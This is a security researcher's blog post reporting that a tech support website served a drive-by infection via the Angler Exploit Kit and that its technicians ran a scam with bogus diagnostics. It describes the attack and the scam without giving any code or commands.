Google ads lead to major malvertising campaign

Tech Support website infects your computer before you even dial in

If you ever need help with your computer you may be interested in remote tech support.

As we have written many times on this blog before, the road to finding a legitimate company is very treacherous.

Many websites that are promoted via ads on search engines or pop ups often turn out to be impostors or crooks and it doesn’t matter whether they are overseas or right here in the U.S.

This time around, our focus is on a company that seems to want a big piece of the U.S. market and boasts their infrastructure as being “ahead of time technology equipment” while “your computer issues are fixed securely“.

This couldn’t be further from the truth.

For some reason, looking at the site gives an impression of déjà-vu. Perhaps it is the template and stock photos typically used by many overseas tech support companies?

Drive-by download infection

While we shouldn’t judge a book by its cover, there is something really wrong that happens when you visit their website:

blocked

For a company that is supposed to fix computers, performing a drive-by download infection (thankfully blocked by Malwarebytes Anti-Exploit) is not a good sign.

One of the html files (a banner) contains a malicious script loading a page from a compromised website.

This site contains an iframe with a dynamic URL that silently redirects the user to the Angler Exploit Kit:

fiddler2

In this case, if your system was outdated and you had no security solution, you would have been victim of the fileless infection followed by additional malware.

The Trojans were already detected by Malwarebytes Anti-Malware:

MBAM

This drive-by infection almost seems like the perfect segue into a malware diagnostic. In fact, right from the beginning of our call, the technician already assumed our computer was infected.

Tech support scam

Sadly, the service provided by American Tech Help is not up to par either. The technicians are quick to point out errors and ‘hackers’ that have compromised your computer by simply showing the (typical) warnings displayed in the Windows Event Viewer:

eventviewer

Alternatively, a system ‘scan’ performed using the dir command also returns a fake custom message (notice the typo):

currupted-typo

But here’s the problem: Before browsing to their site and calling them up we had made sure our computer was fully patched. So while the site attempted to exploit our system, it never succeeded. So the technician’s report is completely bogus.

It is quite possible that the tech support site was simply hacked because of poor security practices and that their owners aren’t aware of it.

Or perhaps they don’t even care until the major browsers start blacklisting them and they see their traffic take a dive.

People looking for tech support services really need to be careful out there. There was a time when we could say that as long as you didn’t let scam artists take remote control of your computer, you were fine.

Now the mere fact of browsing to one of their sites could be the beginning of some real troubles. It is not entirely surprising that such sites are dangerous to visit: they are built quickly, on the cheap and with little to no maintenance. This is just a recipe for disaster as any good website owner would tell you.

For more information on tech support scams and general advice, please check out our Tech Support Scams resource page.

ABOUT THE AUTHOR

Jérôme Segura

Principal Threat Researcher